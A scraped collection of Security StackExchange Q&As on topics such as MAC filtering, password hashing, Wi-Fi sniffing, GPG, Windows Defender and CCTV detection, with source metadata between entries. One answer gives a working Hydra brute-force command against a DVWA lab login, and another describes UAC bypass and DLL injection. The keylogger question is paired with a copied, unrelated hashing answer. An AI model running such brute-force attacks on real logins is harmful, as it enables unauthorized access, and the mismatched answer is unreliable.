"https://security.stackexchange.com/users/33/"
]
} |
36,677 | I just bought a Galaxy S4, and it didn't connect to the WIFI in my house (I have a 14$ router). After a bit of testing, I've decided to leave my connection open without a password, but added the devices manually to the whitelisted MAC addresses. Is that safer than having a regular password, that can be broken with brute
force, or another technique? Is there any other solution that I can try connecting my cellphone to the router? The errors I got were "getting IP Address" , and after that "error: connection too slow...." . I have a good connection. | MAC filtering is not a part of the 802.11 spec, and is instead shoved into wireless routers by (most) vendors. The reason why it's not a part of the 802.11 spec is because it provides no true security (via kerckhoff's principle ). In order for wireless to work, MAC addresses are exchanged in plaintext (Regardless of whether you're using WEP, WPA, WPA2, or an OPEN AP). For encrypted wireless, the MAC address is either a part of the initial handshake (used to derive the session key), and/or exposed during pre-encryption communications. In addition to all of these reasons, MAC filtering is also much more of a pain in the butt to upkeep than instituting something like WPA2-PSK. Simply put, MAC filtering is not something that needs to be "cracked." In open networks, people simply only need to sniff the air and they will be able to see what devices are working, and then they can use one of many , many extremely simple tools to change their MAC address. In encrypted networks, they will need to sniff and grab a new handshake (which can easily be forced via a deauth attack ). From there, they have access to your network. My suggestion is to use WPA2-PSK with a strong key for personal networks or WPA2-Enterprise with a strong EAP mode (PEAP or TLS) for enterprise networks. The main difference between the two of these, aside from the method of authentication and authorization, is that with WPA2-PSK, if someone knows the PSK and can capture the handshake of a user, they can decrypt their stream. That is not possible with WPA2-Enterprise, because it uses EAP, which has a different encryption key per individual via the EAP mode. This is important because you wouldn't want just anybody with access to the network to be able to decrypt the CEO's wireless communications. It is also important to note that with WPA2-PSK, your ESSID does play a part in the security of your network because of the following: DK = PBKDF2(HMAC−SHA1, passphrase, essid, 4096, 256) Essentially, WPA2-PSK uses your ESSID as the salt when running PBKDF2. For this reason, you should also attempt to keep your ESSID unique, to avoid attacks using rainbow tables . In summation - MAC filtering does not provide any level of "true" security - Use WPA2-PSK if possible (Most smartphones do support it) - Try to have a unique ESSID | {
"source": [
"https://security.stackexchange.com/questions/36677",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/26558/"
]
} |
36,721 | These are some ways of disposing of hard drives : Special firms, degaussing, hammering, pulling apart. Can this be accomplished more quickly by drowning it? Fill a bucket with water, maybe add some aggressive cleaning products, throw the drive in, let it sit overnight, then dump it in the garbage. Will the data be irretrievable after that? | Special firms either degauss, destroy or melt the harddrives. Harddrives are magnetic data. Magnetism can be destroyed by either: Degaussing (changing the magnetism) Heating the drive (melting) (which destroys/changes the magnetism) Hammering (shock) (shock damages magnetism somewhat, but the denting of the drive makes it very difficult to read the surface, as metal deforms, the surface area changes as well thus making it even more difficult to determine what is and isn't a sector) Drilling (removes sectors altogether, physically changes the layout of the drive like hammering, generates a large localised amount of heat as well) shooting (same as hammering, but more extreme) Chemical corrosion (if the magnetic substrate is removed from the platters altogether, there's nothing left to recover) Shredding, there's plenty of services that offer to shred your harddrive which leaves you with nothing but metal scraps, nothing to recover there. So, Would simply submerging the drive render it un-usable? No. Probably not to an experienced forensics or recovery team. What WILL kill the drive is corrosion of the platters, so it depends on what you add to the water, how long it stays in there, what the platters are made out of and how good the people trying to recover the data are. | {
"source": [
"https://security.stackexchange.com/questions/36721",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/4980/"
]
} |
36,754 | A friend told to me the following: I don't use Anti-Virus software at all, I am just careful about where I go and what I click on. I've also heard this from other people as I've repaired their PC's and cleaned up the malware/viruses they've received from browsing to the "wrong" sites. Finally I found this blog post that states: To be blunt: I refused to install any kind of antivirus or personal firewall software on most of my computers (but see Update 1/1/2012, below.) This included a Windows XP Home system that was used by my children as a web surfing / email / game system. I suffered zero infections during this time. My question is, are there any documented studies that either prove or disprove these claims of being able to browse the internet carefully and having the same amount of risk of infection as that of browsing the internet with anti-virus software? Note: I thought I remembered seeing a Screen Savers episode one time where they had a PC connected to the internet without any anti-malware or anti-virus and by the end of the show the computer was rendered useless but I couldn't seem to find it. | As mentioned in some of the comments, there are no sites which can be guaranteed safe. Even reputable sites have suffered through banner ads, coding mistakes, deliberate attacks etc. so the first problem is that you cannot trust any website. You can work out a level of likelihood of safety by looking at the code from a sandbox and following links, but many attackers write code that hides from debugging tools or from testing environments, and code often changes attack vector with time. So, to the next part - do you need an antivirus? Absolutely - a huge number of machines connected to the Internet are infected and running as part of botnets. If you don't protect your machine it may end up attacking mine. If you cannot detect malware on your machine I would blame your detection techniques, not think that your machine was clean. From SANS, Expected infection time for an unprotected machine on the Internet is sub-5 minutes! (survivaltime is calculated as the average time between reports for an average target IP address ... aka someone pinging your computer would count as an "infection") Sure, AV is only one layer of security (or potentially 2 if you use AV at gateway and desktop) but all layers have value. Any that you miss increases the likelihood of successful compromise. | {
"source": [
"https://security.stackexchange.com/questions/36754",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/1085/"
]
} |
36,833 | I've read that every good web application should hash passwords. I found many articles about hashing.
So I started implementing hashing on my website and then I asked myself why should I do it? When a user sends his or her login (name+password) to the server, the server loads the password of the given user name from database and then compares passwords. There is no way how the user could get password from the database. Most likely I'm misunderstanding the concept, so can anyone please tell me why anyone should be using hashing? | For any reason, your database may be compromised and its data may be obtained by someone else. If the passwords are in what we call plain text , you will have leaked a piece of sensitive information that your users have trusted you with: their password (which is very likely to be a password shared in multiple services). This is a very serious issue. Instead of plain text, passwords are typically hashed with an one-way hashing function . If the cryptographic function used for the hashing is strong, then the passwords are much safer, because even if someone gets their hands on your database, it's computationally infeasible to calculate the passwords (given only the hashes). On the other hand, the hashed information remains useful to you: Because the same hash function will always yield the same hash for the same input, you can still hash any attempted password and compare the result to your saved hash to verify a user's authentication attempt (without knowing the correct password beforehand). Of course, just hashing is not enough nowadays. There are lookup attacks that often make decryption (of hashes created from predictable passwords) very feasible. To counter these attacks, each password is hashed together with a unique randomly generated piece of input (called salt ). The salt is stored in plain text in the database and it doesn't have to be secret, because its main purpose is to render precomputed hash dictionaries useless. Almost all serious platforms use hashing and salting to store their users' passwords (unless they make use of something different but comparably secure that I'm not aware of). Incidentally, this is exactly why you can reset your password in various services but almost never recover it: The hash can be overwritten by the system, but it can't be decrypted. You should by all means do the sane thing for the sake of your users' security and salt-and-hash your passwords. There are plenty of resources online that explain the process and the pitfalls in detail. One of them is "Secure Salted Password Hashing: How to do it Properly" . | {
"source": [
"https://security.stackexchange.com/questions/36833",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/-1/"
]
} |
36,849 | If I copy a username/password from an email and paste it into an FTP client or an online form in the browser, can keyloggers capture this private information? And does it make any difference whether using: CTRL + C and CTRL + V vs Right-click > Copy, Right-click > Paste Or are both equally vulnerable to keyloggers? | For any reason, your database may be compromised and its data may be obtained by someone else. If the passwords are in what we call plain text , you will have leaked a piece of sensitive information that your users have trusted you with: their password (which is very likely to be a password shared in multiple services). This is a very serious issue. Instead of plain text, passwords are typically hashed with an one-way hashing function . If the cryptographic function used for the hashing is strong, then the passwords are much safer, because even if someone gets their hands on your database, it's computationally infeasible to calculate the passwords (given only the hashes). On the other hand, the hashed information remains useful to you: Because the same hash function will always yield the same hash for the same input, you can still hash any attempted password and compare the result to your saved hash to verify a user's authentication attempt (without knowing the correct password beforehand). Of course, just hashing is not enough nowadays. There are lookup attacks that often make decryption (of hashes created from predictable passwords) very feasible. To counter these attacks, each password is hashed together with a unique randomly generated piece of input (called salt ). The salt is stored in plain text in the database and it doesn't have to be secret, because its main purpose is to render precomputed hash dictionaries useless. Almost all serious platforms use hashing and salting to store their users' passwords (unless they make use of something different but comparably secure that I'm not aware of). Incidentally, this is exactly why you can reset your password in various services but almost never recover it: The hash can be overwritten by the system, but it can't be decrypted. You should by all means do the sane thing for the sake of your users' security and salt-and-hash your passwords. There are plenty of resources online that explain the process and the pitfalls in detail. One of them is "Secure Salted Password Hashing: How to do it Properly" . | {
"source": [
"https://security.stackexchange.com/questions/36849",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/-1/"
]
} |
36,932 | I used openssl to create a X.509 certificate but I don't quite understand the relationship between a X.509 and a SSL certificate. Are they the same? Is a SSL certificate just a X.509 certificate that is used for SSL? | SSL is by far the largest use of X.509 certificates, many people use the terms interchangeably. They're not the same however; a "SSL Certificate" is a X.509 Certificate with Extended Key Usage: Server Authentication (1.3.6.1.5.5.7.3.1). Other "common" types of X.509 certs are Client Authentication (1.3.6.1.5.5.7.3.2), Code Signing (1.3.6.1.5.5.7.3.3), and a handful of others are used for various encryption and authentication schemes. | {
"source": [
"https://security.stackexchange.com/questions/36932",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/-1/"
]
} |
36,958 | I am trying to improve the user experience on registration by not requiring the user to retype their password if validation on other fields fail. There are a few ways to implement this, example using session cookie and storing a hash of the password on the server side. I am exploring this alternative of storing user password temporarily on the client side without having the server to keep track of it. Is this method feasible? What are the risks involved? | In principle, values stored in sessionStorage are restricted to the same scheme + hostname + unique port, and if the browser has a clean exit these values should be deleted at the end of the session. However, according to this post it can survive a browser restart if the user chooses to "restore the session" after a crash (which means its values also exist in persistent memory until they are cleared, so keep that in mind). If well implemented, I'd say it's safe enough - especially compared to your alternative of using a cookie (which has many pitfalls that I wouldn't even consider). The W3C Specification also states that Web Storage might indeed be used to store sensitive data (though it's unclear whether or not that practice is endorsed). As for the risks, it's simply a matter of tradeoffs: you're making your site a little more convenient for your users, while increasing a little the window of opportunity for the password to be captured (either by means of a XSS vulnerability, by the value persisting in persistent storage for longer than you intended to, or by the user leaving the computer unattended before finishing registration). Ideally, passwords should never leave RAM, but that's usually impractical to do, so some compromise is necessary. I'd just advise to clear the password from sessionStorage as soon as the registration succeeds, and to keep an eye for vulnerabilities on sessionStorage implementations that may eventually come to light. | {
"source": [
"https://security.stackexchange.com/questions/36958",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/9312/"
]
} |
36,997 | In Wireless Networks, you can put your wireless card in Promiscuous or in Monitor Mode. What is the difference between these two modes ? | Monitor mode : Sniffing the packets in the air without connecting (associating) with any access point. Think of it like listening to people's conversations while you walk down the street. Promiscuous mode : Sniffing the packets after connecting to an access point. This is possible because the wireless-enabled devices send the data in the air but only "mark" them to be processed by the intended receiver. They cannot send the packets and make sure they only reach a specific device, unlike with switched LANs. Think of it like joining a group of people in a conversation, but at the same time being able to hear when someone says "Hey, Mike, I have a new laptop". Even though you're not Mike, and that sentence was intended to be heard by Mike, but you're still able to hear it. | {
"source": [
"https://security.stackexchange.com/questions/36997",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/26755/"
]
} |
37,020 | I've been playing around with Hydra and DVWA and I've hit a bit of a snag - Hydra responds letting me know that the first 16 passwords in my password list are correct when none of them are. I assume this is a syntax error, but I'm not sure if anyone has seen this before. I've followed several tutorials with no luck so I'm hoping someone where can help. Syntax : hydra 192.168.88.196 -l admin -P /root/lower http-get-form "/dvwa/vulnerabilities/brute/index.php:username=^USER^&password=^PASS^&Login=Login:Username and/or password incorrect." Output Hydra v7.3 (c)2012 by van Hauser/THC & David Maciejak - for legal purposes only
Hydra (http://www.thc.org/thc-hydra) starting at 2013-06-05 22:30:51
[DATA] 16 tasks, 1 server, 815 login tries (l:1/p:815), ~50 tries per task
[DATA] attacking service http-get-form on port 80
[80][www-form] host: 192.168.88.196 login: admin password: adrianna
[STATUS] attack finished for 192.168.88.196 (waiting for children to finish)
[80][www-form] host: 192.168.88.196 login: admin password: adrian
[80][www-form] host: 192.168.88.196 login: admin password: aerobics
[80][www-form] host: 192.168.88.196 login: admin password: academic
[80][www-form] host: 192.168.88.196 login: admin password: access
[80][www-form] host: 192.168.88.196 login: admin password: abc
[80][www-form] host: 192.168.88.196 login: admin password: admin
[80][www-form] host: 192.168.88.196 login: admin password: academia
[80][www-form] host: 192.168.88.196 login: admin password: albatross
[80][www-form] host: 192.168.88.196 login: admin password: alex
[80][www-form] host: 192.168.88.196 login: admin password: airplane
[80][www-form] host: 192.168.88.196 login: admin password: albany
[80][www-form] host: 192.168.88.196 login: admin password: ada
[80][www-form] host: 192.168.88.196 login: admin password: aaa
[80][www-form] host: 192.168.88.196 login: admin password: albert
[80][www-form] host: 192.168.88.196 login: admin password: alexander
1 of 1 target successfuly completed, 16 valid passwords found
Hydra (http://www.thc.org/thc-hydra) finished at 2013-06-05 22:30:51 EDIT I was successful in brute forcing the admin credentials. Once I had authenticated to DVWA I needed to find the cookie information (easily done via your browser or Burp Suite). Once I had the cookie information I issued the following command which worked. hydra 192.168.88.196 -l admin -P /root/lower http-get-form "/dvwa/vulnerabilities/brute/index.php:username=^USER^&password=^PASS^&Login=Login:Username and/or password incorrect.:H=Cookie: security;low;PHPSESSID=<value for PHP SESSID cookie" | Same problem happened to me when I was playing with DVWA. The reason is that you're trying to brute-force YOUR_SERVER/dvwa/vulnerabilities/brute/index.php which needs authentication. Try to visit that page in your browser and you'll be prompted to enter a username and a password (different form from the one you're trying to brute-force) So while you're trying to brute-force this: Hydra is actually "seeing" this: On the second form you won't get the message "Username and/or password incorrect." , which you told Hydra to use to differentiate between failed and successful logins. Hydra doesn't see that failed login message, so it's assuming that the login was successful. So you need to login using a browser, get the session cookie (by default, PHPSESSID ) , and feed it to Hydra, and then Hydra will be able to "see" the first form. Supposedly, you can set the cookie in the HTTP headers in Hydra by doing H=Cookie:NAME=VALUE or pointing Hydra to a file which sets the cookie by doing C=/path/to/file . Unfortunately, non of these worked for me. After getting frustrated, I ended up commenting Line: 5 ( dvwaPageStartup ) in the file /dvwa/vulnerabilities/brute/index.php , which allowed Hydra to see the actual vulnerable login form. | {
"source": [
"https://security.stackexchange.com/questions/37020",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/4386/"
]
} |
37,076 | It would appear as though the tinfoil hat-wearing were vindicated today, as news broke of the true scale of the U.S. government's surveillance of its citizens' online activities, conducted primarily through the NSA and seemingly beyond the realm of the law . If the reports are to be believed, metadata about virtually every aspect of individuals' lives - phone records and geographic data, emails, web application login times and locations, credit card transactions - are being aggregated and subjected to 'big data' analysis. The potential for abuse, especially in light of the recent IRS scandal and AP leak investigation, appears unlimited. Knowing this, what steps can ordinary individuals take to safeguard themselves against the collection, and exposure, of such sensitive personal information? I would start with greater adoption of PGP for emails, open source alternatives to web applications, and the use of VPNs. Are there any other (or better) steps that can be taken to minimize one's exposure to the surveillance dragnet? | Foreword: This problem isn't necessarily about governments. At the most general level, it's about online services giving their data about you (willingly or accidentally) to any third party. For the purposes of readability, I'll use the term "government" here, but understand that it could instead be replaced with any institution that a service provider has a compelling reason to cooperate with (or any institution the service could become totally compromised by -- the implications are reasonably similar). The advice below is generalizable to any case in which you want to use an external service while maintaining confidentiality against anyone who may have access to that service's data. Now, to address the question itself: ...what steps can ordinary individuals take to safeguard themselves against the collection, and exposure, of such sensitive personal information? If you don't want the government of any nation to have access to your data, don't put it on a data-storage service that might possibly collude with a government agency of that nation. For our model, let's assume that some government has access to your data stored on particular major services at rest (as well as their server logs, possibly). If you're dealing with a service that does storage (Google Drive, email) then SSL will do absolutely nothing to help you: maybe a surveillance effort against you cannot see what you're storing as you're sending it over the wire , but they can see what you've stored once you've stored it . Presumably, such a government could have access to the same data about you that Google or Microsoft or Apple has. Therefore, the problem of keeping information secret from surveillance reduces to the problem of keeping it secret from the service provider itself (i.e., Google, MS, Apple, etc.). Practically, I might offer the specific tips to reduce your risk of data exposure: If there's some persistent information (i.e., a document) you don't want some government to see, don't let your service provider see it either. That means either use a service you absolutely trust (i.e., an installation of FengOffice or EtherPad that's running off your SheevaPlug at home (provided you trust the physical security of your home, of course)) or use encryption at rest -- i.e., encrypt your documents with a strong cipher before you send them to Google Drive (I might personally recommend AES, but see the discussion below in the comments). In fact, this second strategy is exactly how "host-proof" Web applications work (also called "zero-knowledge" applications, but unrelated to the concept of zero-knowledge proofs ). The server holds only encrypted data, and the client does encryption and decryption to read and write to the server. For personal information that you don't need persistent access to, like your search history, you can probably prevent that information from being linked back to you personally by confusing the point of origin for each search using a VPN or onion routing like Tor . I'm reminded of this xkcd : : Once a service has your data, it's impossible to control what that service does with it (or how well that service defends it). If you want control of your data, don't give it away . If you want to keep a secret, don't tell it to anyone . So long as the possibility of surveillance collusion or data compromise against a service is non-trivially high, do not expect your externally-stored data to be private from inspection by any government, even if you had expected that data to be generally private. A separate question is whether there will be any significant actual impact to the average internet user from such information-gathering programs. It's impossible to say, at least in part because it's impossible to transparently audit the behavior of people involved in a secret information-collection program. In fact, there could be impact from such a program that would be impossible for the general public to recognize as impact from such a program. In the case of NSA in particular, NSA is chartered to deal with foreign surveillance, so U.S. citizens are not generally targets for analysis, unless perhaps they happen to have a foreign national nearby in their social graph. The NSA publicly makes an effort not to collect information about U.S. citizens (though the degree to which this is followed in practice is impossible to verify, as discussed above). | {
"source": [
"https://security.stackexchange.com/questions/37076",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/21882/"
]
} |
37,080 | I'm an IT consultant. One client has known me for a few years. He wants me to do some work on his kids' laptop again. I'll need to log into his kids' Windows user account. (I'm guessing that multiple kids share one account.) This time, he wants to drop the machine off with me. He'll want to tell me the kids' password ( "plan A" ): he trusts me. But I don't want him to get in the habit of insecure practices like sharing passwords with IT consultants. I could propose and encourage a "plan B" : He changes the kids' password to a new, temporary password. I log in, do the work, then force a password change at next logon. Or I could encourage him to make me an account so that I can follow a "plan C" : I reset the kids' password. I log in, do the work, then force a password change at next logon. Still, I want to keep him happy, and I don't want him to waste time or money. I don't want to encourage plan B or plan C unless absolutely necessary. I wonder: Is it really so bad for him to just tell me the kids' password? If it's bad, please explain why, and please cite a source if you can. (Optional:) I always tell customers a per-hour rate. But lately, I've been billing by the minute. If we choose plan C, is it ethical for me to bill him for the extra minutes it will take me? | The problem isn't with this situation in particular. Let's assess the situation here: You're a trustworthy person to them The password is very likely securing trivial data Giving you the password isn't that big of a deal in this case. The problem (like you stated in your question) is that getting him in the habit of giving out passwords. I'd definitely go with plan B. Why? It's the best compromise between security and convenience in this case. It'll teach him about not sharing password, especially if the lesson is coming from a trustworthy person to him. It'll make you look even more professional and shows your interest in your client's security. You don't know, he might spread the word about this situation and in a way you'd be contributing to a better understanding of security (in this kind of situations) in his circle of friends/family. As for your second question, I don't think I'm the best person to answer this, but I'd say no. If something takes you 2-3 minutes and it's obviously trivial compared to another task (fixing whatever is wrong with the computer) don't actually bill the client for the extra 3 minutes of work. It makes nobody look good. | {
"source": [
"https://security.stackexchange.com/questions/37080",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/11178/"
]
} |
37,227 | While I was walking in the street, somebody carrying a laptop bag bumped into me, and the next day I found out that my storage unit was burglarized and some important items were stolen. My storage unit door uses a magnetic-stripe card without a PIN, and I have several important items there. The items don't include money or anything that has intrinsic value itself, but they could be important to some parties. I do realize my mistake, I shouldn't have trusted a storage unit with important items. I should have stored them in a deposit box in a bank. To help you guys help me, I'll try to give as much information about the situation as possible: I vividly remember his bag hitting my back pocket in an unnatural way. I immediately checked my wallet after the bump, I made sure my ID, money, and the card were there. The stolen items are of some importance to some people and they would hire PI . I've already informed the police and filed a report. The security cameras in the storage area hallway show a masked person opening the door normally, and there are no signs of forced entry. My question is : Could that person have cloned my card when he bumped into me? Is it really as easy as touching the person's pocket? Does the process really take that small amount of time (1-2 seconds)? Update: After investigation it turned out that the card has an RFID tag inside it, but the storage space operators didn't know about it. It was there just in case they wanted to change the locks to support RFID. The magnetic stripe and the RFID tag both contained the same data, so the thief copied the RFID tag and made a new magnetic card with the information. Yesterday the police caught the thief after catching the person who hired him trying to sell the items to a blackmarket honeypot operated by the police. I identified the thief as the person who bumped into me and he later admitted. | It sounds unlikely. As @schroeder says - a mag stripe must be physically run through a reader. So if you must "swipe" the card to get access, you must swipe the card to copy it. While a pickpocket can take a card out of your pocket, if the card is still in your possession, it's unlikely that this interaction was part of the theft. Keep in mind, however, that a single instant in time is not the only case of potential intrusion: any time the card was left unattended for any time is an opportunity any access to a master card is an opportunity - generally a storage unit will have a master key card - they are loaning you this space, if you default on your rent, or the police have a warrant, they will need to access your space. Whichever card is used as a source, making a copy should leave no evidence on the card. It maybe possible, from digital logs, to see what card was used for access at the time of the break-in. Was it your card? Chances are, you and the storage space management need to think through who had access to the cards that control your space. Addition: Backing up a step to a bigger picture. In any theft, there's a question of due diligence. Any type of security is tricky, and needs a diligent design and careful implementation. This particular issue involves: electronics - the mag strip key card physical - the access to your door, and the facility at large, as well as video survellience, personnel - anyone who was supposed to be watching the video, the people with access to the master card, and overall personnel management The easiest hack is generally social engineering and working in the nexus of areas of security, where there are often human communication gaps. The general solution is to work with the site as best you can to determine who might have had access. Accusing them of a lack of due diligence probably isn't going to get the job of finding your stuff done... but sooner or later, you or the PI may need to go there to figure out if you have a insider threat or a fairly clever outside attacker. As the comment thread shows, there's numerous options out there that are bigger than the incident you mention that are just as (if not more) likely as someone managing to pick your pocket. | {
"source": [
"https://security.stackexchange.com/questions/37227",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/26985/"
]
} |
37,310 | I'm from Canada, and I'd like to know one thing. I know a bug on one website. I'm not sure if it's legal here to search for bugs on a website and NOT use them; instead, tell its company about it. | It is legal to tell them about the bug, giving them a detailed description of the bug and how you came across it. What is unpredictable is the company's reaction. It could vary to something such as them sending you a reward/small gift (has happened to me), to them trying to prosecute you as a criminal (tipping them off anonymously could help with this issue). If the bug compromises the website and it's information, make it clear that you have not used the bug in this way. If you have the knowledge, try to make suggestions on how to fix the bug, to make it even clearer to the company that you are trying to help them out (something I did as well). Important note: If the company refuses to recognise the vulnerability, do not seek way to exploit it and get it attention. This will most likely result in legal action against you . | {
"source": [
"https://security.stackexchange.com/questions/37310",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/27042/"
]
} |
37,436 | Some spam messages fresh from my Wordpress filter: Asking questions are in fact pleasant thing if you are not
understanding something totally, except this article gives good
understanding yet. and Thanks for any other informative blog. Where else may I am getting
that kind of information written in such an ideal means? I’ve a
project that I’m simply now working on, and I have been on the look
out for such info. Is it just that basically all blog spam comes from non-English speaking countries, or is there some kind of tactical decision being made about the language? I ask because when I first saw it, I thought perhaps they were being genuine but inarticulate. | The spammers are automatically generating new comments by taking existing comments and running them through a thesaurus program that replaces words with synonyms or related parts of speech. The result is a sentence which makes sense, but has word choices that no native speaker would ever make: Where else may I am getting ... is clearly not something a native speaker would write, but Where else could she be getting... is, and can be transformed by a simple substitution of pronouns and synonyms into the spam text. This way, even if anti-spam forces have a huge database of known-spam comments, the spammers can generate infinitely many new ones that are plausibly English. I long suspected this was the case but I recently got proof. I now occasionally get comment spam containing the entire substitution script; it'll be something like: I can't [believe/understand/comprehend] the [great/superior/amazing] [content/information/data]... Since the spammers were likely non-English speakers to begin with, they didn't notice they were sending the script rather than the output. If you examine a large enough corpus of spam, you can pretty easily figure out what algorithms they're using. It would be an interesting challenge in reverse engineering to write a program that deduces the algorithms used from the corpus. I ask because when I first saw it, I thought perhaps they were being genuine but inarticulate. They fooled you once. It probably won't happen again! Commenter TildalWave points out: none of the sample spam messages OP posted actually endorse any products, or are otherwise promoting any other cause. Well let me give you an example: here's a comment that arrived a few minutes ago on my blog: user name: cuisinart compact toaster review
user url: toasterovenpicks.com
user email: [email protected]
user IP: 37.59.34.218
Comment contents:
One in particular clue for that bride and groom essential their
own absolutely new everything, actually a surname burned which has a mode,
which render nearly girl thankful recognizing their refreshing surname
therefore distinctively printed. The product is promoted in the user's metadata, not in the content of the comment. The content is just an attempt to get past the spam filter. (I suspect that in this case the text is not a mutation of an existing text but rather generated by a Markov process over a corpus of documents about wedding planning.) Obviously anti-spam forces are on to this one too, which is why this was in my spam filter. My spam filter (akismet) on average lets through one spam for every 705 submitted. Again, that's what spammers are going for; they know that 99.9% of their work will never be seen by anyone. They're trying to randomly explore the space of false negatives in spam filters, a space which is getting quite small indeed. | {
"source": [
"https://security.stackexchange.com/questions/37436",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/25874/"
]
} |
37,481 | Little time ago, me and my friends argued if TCP handshake can be passed with a spoofed IP address. Assume I have a web server that allows only certain IP addresses.
Can anyone connect that web server by IP spoof? | Short answer: no. Longer answer: yes, if you control a router device close to the target device (it has to be on the path between the the real source IP address and the target, and on the path between the faked IP address and the target) or if the target network/host accepts source-routed packets . | {
"source": [
"https://security.stackexchange.com/questions/37481",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/16842/"
]
} |
37,510 | I am beginning to use GPG for email encryption. If I use gpg --edit-key [keyID] to change the passphrase, what files will this affect? Will it only affect my private key, and thus I only need to rebackup this key? Will it leave my public key and the revocation certificate alone, or will these need to be regenerated and then distributed and stored, respectively? | Your PGP private key is encrypted at rest. Altering the passphrase re-encrypts your private key, but it does not affect the actual private key itself. Your passphrase is used to encrypt your private key. From How PGP Works : PGP uses a passphrase to encrypt your private key on your machine. Your private key is encrypted on your disk using a hash of your passphrase as the secret key. You use the passphrase to decrypt and use your private key. When you change your passphrase, the protection around your private key has been altered, but the key itself has not. Consequently, the matching public key is still valid, since its corresponding private key is unchanged. You can back up your newly encrypted private key , since the encryption protection around the key has changed, but the key itself is unchanged. | {
"source": [
"https://security.stackexchange.com/questions/37510",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/27223/"
]
} |
37,581 | Looking into the details of Pretty Good Privacy, I'm confused as to the reasoning behind encrypting the message with a session key and the key with the recipient's public key via RSA. I fail to see how this is any safer than straightforwardly RSA-encrypting the actual message. It may very likely be that I am simply too naive in terms of security and encryption, but if I can obtain your RSA private key, why does it matter whether that gives me access to the message body or the other key that will unlock the message body? | RSA isn't really built to encrypt large pieces of plaintext. Each RSA "round" can encrypt 117 bytes of data, and to encrypt more, you'd have to use some chaining mode . Currently, this means extra overhead, slowness (remember, RSA is pretty slow), and security uncertainty (RSA-chaningMode hasn't been scrutinized as other types of encryption schemes). <- BAD By using hybrid encryption (symmetric + asymmetric for the symmetric key) you get the benefit of asymmetric, namely, not having to worry about exchanging keys; and symmetric, very fast and has been well-vetted. <- GOOD For more information please check: How can I use asymmetric encryption, such as RSA, to encrypt an arbitrary length of plaintext? | {
"source": [
"https://security.stackexchange.com/questions/37581",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/22511/"
]
} |
37,588 | How secure is the new Windows 8 anti virus known as Windows Defender? Does it have a protection against malware which uses UAC bypass/process injection/rootkits/process persistence/running the binary directly in the memory? How much can I trust Windows Defender? Is it better than regular AVs like Kaspersky/AntiVir? | Let us analyze each one of the techniques you want the AV to protect against: UAC Bypass: Any process in the Windows environment running with the trusted root certificate can turn off the UAC bit of its own process, as well as any process spawned by it. This means that if your malicious code can inject itself into a process running with the trusted cert, it will have all the privileges of the injected process. Then, if you create another process, you can easily turn its UAC bit off, because this is a built-in feature of Microsoft Windows. This is the technique employed by the Metasploit framework for UAC Bypass. Process Injection: Microsoft provides an API called LoadLibrary through which you can load any arbitrary DLL from the disk into a running process. The only thing that malicious code does is load the arbitrary DLL from within memory, and not from the disk. This is achieved through a technique called Reflective DLL Injection , which Meterpreter makes use of as well. Root Kit Detection: Rootkits operate at ring zero (kernel level), while antivirus products run in userspace. Most of the time, the AV only hooks certain APIs in kernel land. Any process running below the user space cannot be analyzed by the AV. Before Vista, AV products used to load drivers in the kernel for monitoring. However, after the introduction of PatchGuard , that technique can no longer be used by antivirus software. Running the Process Directly Within Memory: This is an area where AVs have made some progress. Nowadays, even if you are directly interacting with a running process, the AV examines the traffic received by the process from the network, and checks it for malicious signatures. However, there are two shortcomings to this approach: first, it is signature based checking, so it is inherently weak. Secondly, it is done only for common Windows processes such as SMB. As you can see, the things you most want to protect against, are the kinds of things against which no AV product can effectively defend. Most of the items you have mentioned are not malicious by nature. Rather, these are considered "features." In Windows 8, Windows Defender is the combination of Microsoft Security Essentials and Microsoft Defender software. On the plus side, it is free, and has low performance impact. However, if you really want to protect against the techniques you have mentioned, Windows Defender, or any other AV product, won't be able to provide an effective solution. For these kind of attacks, Microsoft has another product called the Enhanced Mitigation Experience Toolkit (EMET) . | {
"source": [
"https://security.stackexchange.com/questions/37588",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/25543/"
]
} |
37,686 | Is there any way that an attacker can identify if a CCTV camera is on/operational without direct physical access to the cable/camera? If it is on, is there any way an attacker can tell if its being viewed/recorded or not with access to the camera/cables but no access to the recording/viewing rooms? | This would really depend on whether you care or not of being detected in the process and how much you're willing to invest into equipment, but sure. Provided there aren't some other, obvious signs the camera is on, such as the pan and tilt motors working Low-tech approach : This is actually really similar to how doctors test patients for involuntary reflex reaction with a light source directed in patients' eyes and observing dilation (or lack thereof) of their pupils. Most well designed CCTV cameras would have what is called an Auto Iris (AI) . Basically an automatic method of varying the size of a lens aperture, to allow the correct amount of light to fall on the imaging device. The lens would include a tiny motor and an amplifier, which are used to maintain a desired voltage video signal as produced by varying levels of light falling on its image sensor. By changing the level of light this camera's AI sensor receives, you could visually inspect the camera's iris movement even from an angle it can not record you (depending on its depth of field), or even audibly inspect the presence of such AI motor. Since these would be precision step (or stepper) motors, you would hear either a distinct buzz of it rotating, or the faint click when it's adjusted its step. Beware though, some ultra silent stepper motors have been developed already, tho I have yet to see CCTV cameras actually using them. Similar testing could be applied to other camera's components (e.g. auto-focus), with varying degree of how stealthy the tester could remain during this testing. High-tech approach : This is easy and rather obvious - electronic bug detectors are capable of detecting compromising emanations (basically EMI: RF -> microwave -> IR fields in their descending wavelength / increasing frequency). Obviously they would all have some way of telling you which direction the compromising emanations are originating from, and most also at what specific frequencies and their exact strength. Such devices are getting fairly cheap nowadays, and you can buy pretty decently capable ones off local resellers for up to a few hundred dollars, or even a second-hand one for roughly a quarter of that price off online resellers. Since the choice is fairly good, I won't give you any links to specific products, not wanting to endorse any specific manufacturer. This detection would work both for wired, as well as wireless CCTV cameras. Wired 